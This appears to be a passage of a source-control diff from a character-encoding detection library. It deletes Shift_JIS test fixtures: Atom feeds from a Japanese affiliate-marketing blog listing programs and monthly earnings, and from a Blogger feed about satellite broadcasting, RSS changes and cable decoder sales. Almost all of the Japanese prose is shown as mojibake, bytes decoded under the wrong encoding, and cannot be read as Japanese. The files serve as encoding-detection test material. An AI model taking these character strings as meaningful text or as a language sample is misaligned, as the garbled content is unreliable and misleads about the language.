    “‚ֹ‚ֲ‚¢‚ִ‚אA‘¼‚ּƒTƒCƒg‚ֵ‚ּ‚א‚ּ‚×–w‚ַ‚ֶ‚¢‚₪´‚¶‚ֵA“–ƒTƒCƒg‚©‚ח‚ֽ‚‚¾‚‚¾‚ֵ‚·B

    - -

    ‚ֶ‚ט‚ ‚¦‚¸A‚ּ“‚×2–‰~‚נ’´‚¦‚ִ‚‚·‚×A–‘«‚ּ‚¢‚­‚א‚ּ‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB
    -”N––‚ֹ‚¯‚ִA‚ז‚טˆך‘|ז’£‚ח‚ָ‚¯‚ך‚־‚ֶv‚ֱ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -Google AdsenseiƒO[ƒOƒ‹EƒAƒhƒZƒ“ƒXj - -2005-11-09T06:55:07Z -2005-11-09T06:08:51Z -tag:www.bloglelife.com,2005://1.16 -2005-11-09T06:08:51Z -‰^‰c‰ן׀ƒO[ƒOƒ‹”®‰ן׀U‚“ת—‚‚ּ––‚‚ֵ ֵ’בU‚‹אz100USƒhƒ‹¦U‚ט”—¿–³—¿ -¦U‚‚ּƒ[ƒg‚ֹ]‚¢A‰~‚ֹ·Z‚µ‚ִx•¥‚ם‚ך‚י - -wasshari - - - -ASP׀‰מ - -¢Eֵ‘ו‚ּץƒTƒCƒg‚ֵ‚ ‚יƒO[ƒOƒ‹‚׉^‰c‚µ‚ִ‚¢‚‚·B

    - -

    ’ם‚ּƒAƒtƒBƒƒGƒCƒg‚ֶ‚ֽˆב‚¢AL˜g‚נƒy[ƒW“א‚ֹ’u‚·‚י‚ֶA‚»‚ּƒy[ƒW‚ּ“א—e‚ֹ“K‚µ‚½L‚נ©“®“I‚ֹ•\¦‚µ‚ִ‚­‚ך‚‚·B

    - -

    —ב‚¦‚־AƒAƒtƒBƒƒGƒCƒg‚ֹײ‚·‚יƒy[ƒW‚ּך‡‚ֵ‚ ‚ך‚־AASP‚ָ‚ַ‚ּL‚×f‚³‚ך‚י‚ֶ‚¢‚ֱ‚½‹ן‡‚ֵ‚·B

    - -

    •סV‚ּm’ט‚ֽƒNƒƒbƒN‚ֵ‚ּ‚s‚ם‚ךA‚»‚ּז‚ֵA₪•i‚נw“‚µ‚½‚ֶ‚µ‚ִ‚אA‚»‚ך‚ֽ•סV‚ֹ‚ָ‚ט‚‚¹‚ס‚×A1ƒNƒƒbƒN“–‚ט‚ּ•סV‚ׂ‚¢‚ּ‚דֱ’¥‚ֵ‚·B

    - -

    L‚ֹ‚א‚ז‚ט‚‚·‚×A1ƒNƒƒbƒN‚ֵ100‰~ˆָד‚ּ‚א‚ּ‚א‚ ‚ט‚‚·B‚½‚¾A“¯‚¶L‚ֵ‚א–ˆ‰ס“¯‚¶•סV‚ֶ‚¢‚₪–‚ֽ‚ ‚ט‚‚¹‚סB

    - -

    ‚±‚ך‚ֽAƒL[ƒ[ƒh‚ֹ‘־‚µ‚ִ“D•®‚×ּ—p‚³‚ך‚ִ‚י‚©‚ח‚ּ‚ז‚₪‚ֵ‚·B
    -l‹C‚ּ‚‚¢ƒL[ƒ[ƒh‚ֹ‘־‚·‚יL‚ּך‡A“Dz‚×ד‚ׂי‚ּ‚ֵA‚»‚ּ•וסV‚אד‚ׂי‚ֶ‚¢‚ֱ‚½´‚¶‚ֵ‚·B

    - -

    ‚ֶ‚ֽ‚¢‚¦A•½‹ֿ‚·‚י‚ֶ10`20‰~‚ֶ‚¢‚ֱ‚½‚ֶ‚±‚כ‚¾‚ֶv‚¢‚‚·B

    - -

    ‚‚½A©•ֵׂƒNƒƒbƒN‚·‚י‚±‚ֶ‚ֽ“–‘R‹ײ~‚³‚ך‚ִ‚¢‚‚·B
    -ˆב”½‚×”­o‚·‚ך‚־A_–ס‚נ‰נ‚³‚ך‚‚·‚ּ‚ֵ‚»‚₪‚¢‚₪sˆ׳‚ֽ‚ג‚‚½•‚ׂ¢‚¢‚ֵ‚µ‚ו‚₪B

    - -

    ְA’m‚ֱ‚ִ‚יl‚ֵ_–ס‚נ‰נ‚³‚ך‚½l‚ׂ¢‚‚·B
    -“ֻ‘RƒƒOƒCƒ“‚×o—ˆ‚ָ‚­‚ָ‚י‚»‚₪‚ֵ‚·B

    - -
    ‰^‰c‰ן׀ƒO[ƒOƒ‹”®‰ן׀
    U‚“ת—‚‚ּ––‚‚ֵ
    ֵ’בU‚‹אz100USƒhƒ‹¦
    U‚ט”—¿–³—¿
    -¦U‚‚ּƒ[ƒg‚ֹ]‚¢A‰~‚ֹ·Z‚µ‚ִx•¥‚ם‚ך‚י - -

    «««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@«««
    -
    -

    ]]> - -
    -
    - -2005”N10‚ּ“ - -2005-11-05T05:19:58Z -2005-11-05T05:10:16Z -tag:www.bloglelife.com,2005://1.15 -2005-11-05T05:10:16Z -JANetiƒWƒƒƒlƒbƒgj7,318Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj6,293Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj5,535Link Shareiƒƒ“ƒNEƒVƒFƒAj2,103‡v\21,249 - -wasshari - - - -“Report - -JANetiƒWƒƒƒlƒbƒgj7,318Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj6,293Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj5,535Link Shareiƒƒ“ƒNEƒVƒFƒAj2,103‡v\21,249 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@162,816‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    - -

    ƒuƒƒO‚נ‰^‰c‚µ‚ִ‚¢‚יƒT[ƒo[‚׉ף‚ךA‹L–‚בS‚ִ–³‚­‚ָ‚ֱ‚½‚ס‚ֵ‚·‚×A™X‚ֹ‹L–‚א‘‚¦‚ִ‚«‚ִ‚‚·B
    -‚ֶ‚ט‚ ‚¦‚¸‚ֽAASP‚ּ׀‰מ‚ג“ƒƒ|[ƒg‚ֵ‚·‚×A‚»‚ךˆָO‚ּƒƒjƒ…[‚ּ‹L–‚א‘‚ג‚µ‚ִ‚¢‚«‚½‚¢‚ֶ‚±‚כ‚ֵ‚·B

    - -

    ‚¾‚¢‚½‚¢1ƒ–20,000‰~‘Oד‚ּ“‚נ“¾‚ִ‚‚·‚×A‚א‚₪­‚µ‘‚ג‚µ‚½‚¢‚ּ‚×–{‰¹‚ֵ‚·B

    - -

    ‚»‚ּˆ׳‚ֹ‚אAƒAƒNƒZƒX”‚נ‚ַ‚₪‚ג‚ֱ‚ִ‘‚ג‚·‚©‚׉‘ט‚ָ‚ס‚ֵ‚·‚×A‹L–‚בS‚ֱִ‚¦‚½‚±‚ֶ‚ֹ‚ז‚טAƒy[ƒW”‚׈ך‹C‚ֹ—‚¿‚½‚±‚ֶ‚א‚ ‚טAƒAƒNƒZƒX”‚א¸‚ט‚‚µ‚½B

    - -

    ‚»‚₪‚¢‚₪‚±‚ֶ‚א‚ ‚י‚ּ‚ֵA‚‚¸‚ֽ‹L–‚נ‘‚ג‚·‚ֶ¾‚₪‚ז‚טA–‚·‚ֶ‚¢‚₪•‚׳‚µ‚¢‚ֶl‚¦‚ִ‚¢‚‚·B
    -“©‘ּ‚ֽ‚»‚ך’צ—‚¿‚ִ‚¢‚ָ‚¢‚ּ‚ֵA‹L–”‚נ–‚¹‚־©‚¸‚ֶ“‚אד‚ׂי‚ּ‚ֵ‚ֽ‚ֶ‚¢‚₪´‚¶‚ֵ‚·B

    ]]> - -
    -
    - -2005”N9‚ּ“ - -2005-10-28T07:10:55Z -2005-10-27T05:34:04Z -tag:www.bloglelife.com,2005://1.14 -2005-10-27T05:34:04Z -Link Shareiƒƒ“ƒNEƒVƒFƒAj186‚»‚ּ‘¼12,828‡v\13,014 - -wasshari - - - -“Report - -Link Shareiƒƒ“ƒNEƒVƒFƒAj186‚»‚ּ‘¼12,828‡v\13,014 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@141,567‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -2005”N8‚ּ“ - -2005-10-28T04:26:25Z -2005-10-27T05:30:36Z -tag:www.bloglelife.com,2005://1.13 -2005-10-27T05:30:36Z -A8.netiƒG[ƒnƒ`ƒlƒbƒgj5,306JANetiƒWƒƒƒlƒbƒgj6,740Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj5,971Link Shareiƒƒ“ƒNEƒVƒFƒAj1,999‚»‚ּ‘¼19,274‡v\39,290 - -wasshari - - - -“Report - -A8.netiƒG[ƒnƒ`ƒlƒbƒgj5,306JANetiƒWƒƒƒlƒbƒgj6,740Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj5,971Link Shareiƒƒ“ƒNEƒVƒFƒAj1,999‚»‚ּ‘¼19,274‡v\39,290 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@128,553‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -2005”N7‚ּ“ - -2005-10-28T00:57:58Z -2005-10-27T05:25:07Z -tag:www.bloglelife.com,2005://1.12 -2005-10-27T05:25:07Z -JANetiƒWƒƒƒlƒbƒgj6,223‚»‚ּ‘¼800‡v\7,023 - -wasshari - - - -“Report - -JANetiƒWƒƒƒlƒbƒgj6,223‚»‚ּ‘¼800‡v\7,023 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@89,263‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -2005”N6‚ּ“ - -2005-10-27T10:26:35Z -2005-10-27T05:21:43Z -tag:www.bloglelife.com,2005://1.11 -2005-10-27T05:21:43Z -Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj6,277Value Commerceiƒoƒƒ…[EƒRƒ}[ƒXj8,800‚»‚ּ‘¼2,030‡v\17,107 - -wasshari - - - -“Report - -Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj6,277Value Commerceiƒoƒƒ…[EƒRƒ}[ƒXj8,800‚»‚ּ‘¼2,030‡v\17,107 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@82,240‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -2005”N5‚ּ“ - -2005-10-27T07:26:27Z -2005-10-27T02:09:21Z -tag:www.bloglelife.com,2005://1.10 -2005-10-27T02:09:21Z -A8.netiƒG[ƒnƒ`ƒlƒbƒgj19,531Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj4,828Link Shareiƒƒ“ƒNEƒVƒFƒAj1,415‡v25,774 - -wasshari - - - -“Report - -A8.netiƒG[ƒnƒ`ƒlƒbƒgj19,531Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj4,828Link Shareiƒƒ“ƒNEƒVƒFƒAj1,415‡v25,774 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@65,133‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -2005”N4‚ּ“ - -2005-10-27T05:14:03Z -2005-10-27T02:03:18Z -tag:www.bloglelife.com,2005://1.9 -2005-10-27T02:03:18Z -JANetiƒWƒƒƒlƒbƒgj7,907‚»‚ּ‘¼920‡v\8,827 - -wasshari - - - -“Report - -JANetiƒWƒƒƒlƒbƒgj7,907‚»‚ּ‘¼920‡v\8,827 - -

    ‚±‚ך‚‚ֵף‚¯ז‚ֱ‚½‡v‹אzF@39,359‰~

    - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -2005”N3–˜‚ּ“ - -2005-10-27T05:14:38Z -2005-10-27T01:48:13Z -tag:www.bloglelife.com,2005://1.8 -2005-10-27T01:48:13Z -A8.netiƒG[ƒnƒ`ƒlƒbƒgj4,977JANetiƒWƒƒƒlƒbƒgj6,785Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj16,600Link Shareiƒƒ“ƒNEƒVƒFƒAj170‚»‚ּ‘¼2,000‡v\30,532 - -wasshari - - - -“Report - -A8.netiƒG[ƒnƒ`ƒlƒbƒgj4,977JANetiƒWƒƒƒlƒbƒgj6,785Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj16,600Link Shareiƒƒ“ƒNEƒVƒFƒAj170‚»‚ּ‘¼2,000‡v\30,532 - -

    ְ‚ֹף‚¯ז‚ֱ‚½‹אz‚נ•\¦‚µ‚ִ‚¢‚‚·B

    ]]> - -
    -
    - -ƒAƒNƒZƒXƒgƒ[ƒh‚ּƒT[ƒrƒXד - -2005-10-25T03:45:48Z -2005-10-25T03:32:51Z -tag:www.bloglelife.com,2005://1.7 -2005-10-25T03:32:51Z -ƒƒWƒƒ[ASP‚ּ1‚ֲ‚ֵ‚ ‚יAƒAƒNƒZƒXƒgƒ[ƒh‚ֹנ‚µ‚¢ƒjƒ…[ƒX‚ֵ‚·B - -‚±‚ך‚‚ֵAֵ’בx•¥‹אz‚×5,000‰~‚ֵ‚µ‚½‚×Aˆך‹C‚ֹ1,000‰~‚ֹ‰÷‚ׂט‚‚µ‚½B - -‚‚½AUט”—¿‚אeBANKAOˆהZ—F‹גs‚ֵ‚ ‚ך‚־–³—¿‚ֹA‚»‚ּ‘¼‚ּ‹גs‚ֵ‚א‚±‚ך‚‚ֵ367‰~‚©‚ח262‰~‚ֹˆר‚«‰÷‚°‚ח‚ך‚ִ‚¢‚‚·B - -wasshari - - - -ƒjƒ…[ƒX - -ƒƒWƒƒ[ASP‚ּ1‚ֲ‚ֵ‚ ‚יAƒAƒNƒZƒXƒgƒ[ƒh‚ֹנ‚µ‚¢ƒjƒ…[ƒX‚ֵ‚·B

    - -

    ‚±‚ך‚‚ֵAֵ’בx•¥‹אz‚×5,000‰~‚ֵ‚µ‚½‚×Aˆך‹C‚ֹ1,000‰~‚ֹ‰÷‚ׂט‚‚µ‚½B

    - -

    ‚‚½AUט”—¿‚אeBANKAOˆהZ—F‹גs‚ֵ‚ ‚ך‚־–³—¿‚ֹA‚»‚ּ‘¼‚ּ‹גs‚ֵ‚א‚±‚ך‚‚ֵ367‰~‚©‚ח262‰~‚ֹˆר‚«‰÷‚°‚ח‚ך‚ִ‚¢‚‚·B

    - -

    ¡”N‚ֹ“‚ֱ‚ִeASP‚×Aֵ’בx•¥‹אz‚גUט”—¿‚נˆר‚«‰÷‚°‚ִ‚¢‚י‚ּ‚×–—§‚¿‚‚·B
    -ƒAƒtƒBƒƒGƒCƒg‚ּƒj[ƒY‚׋}‘¬‚ֹL‚ׁ‚ִ‚¢‚י‚ֶ“¯‚ֹAeASPװ‚ֵ‚ּ‹£‘ˆ‚׃‰»‚µ‚ִ‚¢‚י‚©‚ח‚¾‚ֶv‚ם‚ך‚‚·‚×AƒAƒtƒBƒƒGƒCƒ^[‚ֹ‚ֶ‚ֱ‚ִ‚ֽ½}‚·‚׳‚«ף‹µ‚ֵ‚·B

    - -

    ‚±‚ּ’²q‚ֵA‘¼‚ּASP‚א’ַ‚µ‚ִ—~‚µ‚¢‚ֶ‚±‚כ‚ֵ‚·B

    - -

    ƒAƒNƒZƒXƒgƒ[ƒh-ƒp[ƒgƒi[ƒTƒCƒg•וW

    ]]> - -
    -
    - -Value Commerceiƒoƒƒ…[EƒRƒ}[ƒXj - -2005-10-11T07:51:58Z -2005-10-11T07:38:07Z -tag:www.bloglelife.com,2005://1.6 -2005-10-11T07:38:07Z -‰^‰c‰ן׀ƒoƒƒ…[ƒRƒ}[ƒX”®‰ן׀U‚“ת—‚X‚ּ‚P‚T“ת ֵ’בU‚‹אz5,000‰~U‚ט”—¿252‰~¦ - -«««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@««« -‘“אֵ‘ו‹‰ƒAƒtƒBƒƒGƒCƒg‚ּƒoƒƒ…[ƒRƒ}[ƒX - -wasshari - - - -ASP׀‰מ - -ƒƒWƒƒ[‚ָASP‚ּ1‚ֲ‚ֵ‚·B

    - -

    L”‚ב½‚­A‘“אֵ‘ו‹‰‚ּASP‚ֵ‚·B
    -Yahoo!‚×Q“‚µ‚½‚±‚ֶ‚ֹ‚ז‚טA¡ד‚את‘ׂ‚ֵ‚«‚‚·B

    - -

    ‘¼‚ּASP‚ֶ”ה‚׳‚י‚ֶב±AR¸‚×µ‚µ‚¢‚ֵ‚·‚×A’ם‚ּƒTƒCƒg‰^‰c‚נ‚µ‚ִ‚¢‚ך‚־–ג‘ט‚ ‚ט‚‚¹‚סB
    -„‚׉^‰c‚µ‚ִ‚¢‚י•‚ּƒTƒCƒg‚ֽAƒƒjƒ…[‚µ‚©‚ָ‚¢‚ז‚₪‚ָף‘װ‚ּ‚ֹA“o˜^\¿‚נ‚µ—‚¿‚‚µ‚½B‚»‚ּדA“א—e‚נ[ְ‚³‚¹’סg‚ֹ‚ֱ‚½‚±‚ֶ‚ׂ ‚ט‚‚·B

    - -

    ‚ ‚ֶAg‚¢ט‚ֹ‚ג‚ג“ן‚ׂ ‚ט‚‚·B
    -µ‚ך‚ך‚־–ג‘ט‚ָ‚¢‚ֵ‚·‚×A‘¼‚ּASP‚ֶ‚ֽב±‚±‚ֶ‚ָ‚ט‚‚·B

    - -

    ˆ—‘¬“x‚א­‚µ’x‚¢‚ֶ‚¢‚₪‚ּ‚א‚¢‚½‚¾‚¯‚ָ‚¢•”•ֵׂ‚·B

    - -

    –L•x‚ָL‚ׂ±‚ך‚ח‚נƒJƒo[‚µ‚ִ‚¢‚י‚ֶ¾‚ֱ‚ִ‚א‚¢‚¢‚©‚א‚µ‚ך‚‚¹‚סB
    -‚ַ‚¿‚ח‚ֹ‚µ‚ִ‚אQ‰ֱ‚µ‚½‚¢ASP‚ֹװˆב‚¢‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪B

    - -
    ‰^‰c‰ן׀ƒoƒƒ…[ƒRƒ}[ƒX”®‰ן׀
    U‚“ת—‚X‚ּ‚P‚T“ת
    ֵ’בU‚‹אz5,000‰~
    U‚ט”—¿252‰~¦
    -¦‹גs‚גU‚‹אz‚ֹ‚ז‚טˆ‚ָ‚י‚ֶv‚ם‚ך‚‚·B - -

    «««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@«««
    -‘“אֵ‘ו‹‰ƒAƒtƒBƒƒGƒCƒg‚ּƒoƒƒ…[ƒRƒ}[ƒX

    ]]> - -
    -
    - -Link Shareiƒƒ“ƒNEƒVƒFƒAj - -2005-10-11T08:23:49Z -2005-10-10T08:38:57Z -tag:www.bloglelife.com,2005://1.5 -2005-10-10T08:38:57Z -‰^‰c‰ן׀ƒƒ“ƒNƒVƒFƒAE ƒWƒƒƒpƒ“”®‰ן׀U‚“ת3ƒ–ד‚ּ10“ת ֵ’בU‚‹אz1‰~U‚ט”—¿–³—¿ - -«««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@««« -ƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€Eƒƒ“ƒNƒVƒFƒA - -wasshari - - - -ASP׀‰מ - -ƒƒWƒƒ[‚ָASP‚ּ1‚ֲ‚ֵA¢E‚ֵֵ‰‚ּASP‚ֵ‚א‚ ‚ט‚‚·B

    - -

    “ת–{‚ֵ‚ֽOˆה•¨Y‚׉^‰c‚µ‚ִ‚¢‚½‚¹‚¢‚©A‘וטי‹ֶ‚ב½‚¢‚ּ‚א“ֱ’¥‚ֵ‚·B
    -‘וטי‹ֶ‚ב½‚¢‚ֶ‚¢‚ֱ‚ִ‚אAˆ‚µ‚ִ•~‹‚ׂ‚¢‚ם‚¯‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB’N‚ֵ‚אQ‰ֱ‚ֵ‚«‚‚·B

    - -

    ˆָ‘O‚ֽ5,000‰~‚¾‚ֱ‚½ֵ’בU‚‹אz‚ֽA1‰~‚ֹ‚ָ‚טAU‚ט”—¿‚א‚¢‚ח‚ָ‚­‚ָ‚ט‚‚µ‚½B
    -‚µ‚©‚אAֱ”ןֵ•ּׂ5“‚נדז‚¹‚µ‚ִU‚ס‚ֵ‚­‚ך‚‚·B

    - -

    ƒAƒtƒBƒƒGƒCƒg‚ֹ‘־‚·‚יp¨Aˆ׃‹C‚‚×´‚¶‚ח‚ך‚‚·B

    - -
    ‰^‰c‰ן׀ƒƒ“ƒNƒVƒFƒAE ƒWƒƒƒpƒ“”®‰ן׀
    U‚“ת3ƒ–ד‚ּ10“ת
    ֵ’בU‚‹אz1‰~
    U‚ט”—¿–³—¿
    - -

    «««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@«««
    -ƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€Eƒƒ“ƒNƒVƒFƒA

    ]]> - -
    -
    - -Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj - -2005-10-25T03:44:02Z -2005-10-10T08:22:23Z -tag:www.bloglelife.com,2005://1.4 -2005-10-10T08:22:23Z -‰^‰c‰ן׀”®‰ן׀ƒCƒ“ƒ^[ƒXƒy[ƒXU‚“ת—‚X‚ּ15“תֵ’בU‚‹אz1,000‰~U‚ט”—¿–³—¿¦ - -«««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@««« -ƒAƒNƒZƒXƒgƒ[ƒh-ƒp[ƒgƒi[ƒTƒCƒg•וW - -wasshari - - - -ASP׀‰מ - -ƒƒWƒƒ[‚ָASP‚ּ1‚ֲ‚ֵ‚·B

    - -

    ‘€ל«‚א—ַ‚­AL‚ּ‘½‚³‚ג•סV‚ָ‚ַƒoƒ‰ƒ“ƒX‚ּז‚ך‚½ASP‚ֵ‚·B

    - -

    Access TradeiƒAƒNƒZƒXEƒgƒ[ƒhj‚ּ“ֱ’¥‚ּ1‚ֲ‚ֹAƒ|ƒCƒ“ƒgƒoƒbƒN‹@”\‚ׂ ‚ט‚‚·B
    -‚±‚ּ‹@”\‚נg‚₪‚±‚ֶ‚ֵƒ|ƒCƒ“ƒgׂ³ƒTƒCƒg‚נ‰^‰c‚·‚י‚±‚ֶ‚אo—ˆ‚‚·B

    - -

    ‰‚³‚¦‚½‚¢ASP‚ֵ‚ ‚י‚±‚ֶ‚ֽװˆב‚¢‚ ‚ט‚‚¹‚סB

    - -
    ‰^‰c‰ן׀”®‰ן׀ƒCƒ“ƒ^[ƒXƒy[ƒX
    U‚“ת—‚X‚ּ15“ת
    ֵ’בU‚‹אz1,000‰~
    U‚ט”—¿–³—¿¦
    eBANKAOˆהZ—F‹גs‚ּך‡‚ֽ–³—¿B‚»‚ּ‘¼‚ֽ262‰~ - -

    «««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@«««
    -ƒAƒNƒZƒXƒgƒ[ƒh-ƒp[ƒgƒi[ƒTƒCƒg•וW

    ]]> - -
    -
    - -Traffic Gateiƒgƒ‰ƒtƒBƒbƒNEƒQ[ƒgj - -2005-10-11T07:54:44Z -2005-10-10T05:39:42Z -tag:www.bloglelife.com,2005://1.3 -2005-10-10T05:39:42Z -‰^‰c‰ן׀ƒgƒ‰ƒtƒBƒbƒNƒQ[ƒg”®‰ן׀U‚“ת—‚X‚ּ15“תֵ’בU‚‹אz3,000‰~U‚ט”—¿–³—¿¦ - -«««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@««« -‚s‚f|ƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€ - -wasshari - - - -ASP׀‰מ - -ƒƒWƒƒ[‚ָASP‚ּ1‚ֲ‚ֵ‚·B

    - -

    y“V‚ֶƒTƒCƒo[ƒG[ƒWƒFƒ“ƒg‚נ”ו‚ֹ‚¿A‚±‚±‚ֹ‚µ‚©‚ָ‚¢L‚א‘עR‚ ‚ט‚‚·B

    - -

    ˆָ‘O‚ֽ5,000‰~‚¾‚ֱ‚½Aֵ’בU‚‹אz‚א3,000‰~‚ֹ‰÷‚ׂטA‚ז‚טˆµ‚¢‚ג‚·‚­‚ָ‚ט‚‚µ‚½B
    -ֲl“I‚ֹD‚«‚ָASP‚ֵ‚א‚ ‚ט‚‚·B

    - -
    ‰^‰c‰ן׀ƒgƒ‰ƒtƒBƒbƒNƒQ[ƒg”®‰ן׀
    U‚“ת—‚X‚ּ15“ת
    ֵ’בU‚‹אz3,000‰~
    U‚ט”—¿–³—¿¦
    ƒWƒƒƒpƒ“ƒlƒbƒg‹גs‚ֽ–³—¿B‚»‚ךˆָO‚ֽט”—¿‚ׂ©‚©‚ט‚‚·B - -

    «««@‚¨\‚‚ֽA‚±‚¿‚ח‚©‚ח‚ַ‚₪‚¼@«««
    -‚s‚f|ƒAƒtƒBƒƒGƒCƒgƒvƒƒOƒ‰ƒ€

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/brag.zaka.to.xml b/chardet/tests/SHIFT_JIS/brag.zaka.to.xml deleted file mode 100644 index ea2729d..0000000 --- a/chardet/tests/SHIFT_JIS/brag.zaka.to.xml +++ /dev/null @@ -1,205 +0,0 @@ - - - - - - -BRAG ZAKATO HEADLINE -Writing and Editing for Future Technologies. - -tag:blogger.com,1999:blog-5867717 -2005-05-08T03:32:18Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - - -kuchiki - -2005-05-05T20:35:00+09:00 -2005-08-24T07:08:09Z -2005-05-05T11:35:38Z - -tag:blogger.com,1999:blog-5867717.post-111529293892556057 -‚a‚rƒfƒWƒ^ƒ‹A‚O‚V”N“x‚©‚ח‚Q‹ַ‘c‘–±ָ•jFoֿƒjƒ…[ƒXF@Money : Yomiuri On-Line (“ַ”„V•·) - -
    ‚¿‚ו‚ֱ‚ֳֶ‚¢˜b‘ט‚ֵ‚·‚×B
    -
    ‚ֲ‚‚טAƒAƒiƒƒOBS 9ch‚ּ”p~‚ֹ”÷‚¢Aƒgƒ‰ƒ“ƒXƒ|ƒ“ƒ_1‚ֲ•׋ף‚­‚¯‚ַA‚»‚ך‚ּg‚¢“¹‚ֽƒfƒWƒ^ƒ‹ƒnƒCƒrƒWƒ‡ƒ“ƒ`ƒƒƒ“ƒlƒ‹2‚ֲ‚נV‹KQ“‚³‚¹‚‚µ‚ו‚₪‚©H ‚ֶ‚¢‚₪‚¨˜b‚ֵ‚·‚ָB»ף–¯•תe׀‚×ּZ‚×ז‚ך‚ִ‚ָ‚¢’†AV‹KQ“‚ֽ‚ָ‚©‚ָ‚©“ן‚µ‚¢‚ֶv‚₪‚ּ‚ֵ‚·‚×ccBNHK BS1/2‚ּ‰ז¿ד—p‚ֶ‚©‚ֹg‚ֱ‚½‚‚₪‚ׂ¢‚¢‚ֶv‚₪‚ס‚ֵ‚·‚×A‚ַ‚₪‚ֵ‚·‚©‚ֻ‚¦B‚‚ A¡ד‚»‚ּ•׃‚ֽ˜b‚µ‡‚ם‚ך‚י‚ּ‚¾‚ֶv‚¢‚‚·‚×B
    -
    -false -
    - - - -kuchiki - -2005-05-05T20:28:00+09:00 -2005-05-05T11:31:14Z -2005-05-05T11:31:14Z - -tag:blogger.com,1999:blog-5867717.post-111529267475384464 -‚·‚ֱ‚©‚טXV‚µ‚ִ‚¨‚ט‚‚¹‚ס‚× - -
    Blogger‚×d‚­‚ִ‚ג‚י‹C‚׸‚¹‚½‚ֶ‚©Aƒlƒ^‚ָׂ‚¢‚ֶ‚©‚¢‚כ‚¢‚כ–מ‚ֽ‚ ‚ט‚‚·‚×AXV‚µ‚ִ‚‚¹‚ס‚ֻB‘ו•ֿ\‚µ–ף‚ָ‚¢B
    -
    ‚ֵA‚ֶ‚ט‚ ‚¦‚¸‰צ‚µ‚°‚ָRSSƒtƒB[ƒh‚©‚חAFeedBurner‚נg‚ֱ‚½RSS”zM‚ֹ•ֿ‚¦‚ִ‚‚‚µ‚½BSubscribe‚³‚ך‚ִ‚י•‚ֽ‚±‚¿‚ח‚נƒ`ƒFƒL‚µ‚ִ‚¢‚½‚¾‚¯‚י‚ֶK‚¢‚ֵ‚·B
    -
    ‚ֵA6‚ֹ‚ֽƒT[ƒo[ˆ“]‚ֹ‚ֶ‚א‚ָ‚¢Blogger‚©‚ח‚ּ’E‹p‚נ–w‚µ‚ִִn“®‚·‚י—\’ט‚ֵ‚·B‚²ת‘ׂ‚­‚¾‚³‚¢B
    -
    -false -
    - - - - -kuchiki - -2005-03-03T02:14:40+09:00 -2005-03-02T17:14:40Z -2005-03-02T17:14:40Z - -tag:blogger.com,1999:blog-5867717.post-110978368018592335 -ƒAƒLƒo‚ּƒP[ƒuƒ‹ƒeƒƒr(CATV)ƒXƒNƒ‰ƒ“ƒuƒ‹‰נƒ`ƒ…[ƒi[₪”„‚ֽ‚»‚כ‚»‚כI—¹H - -
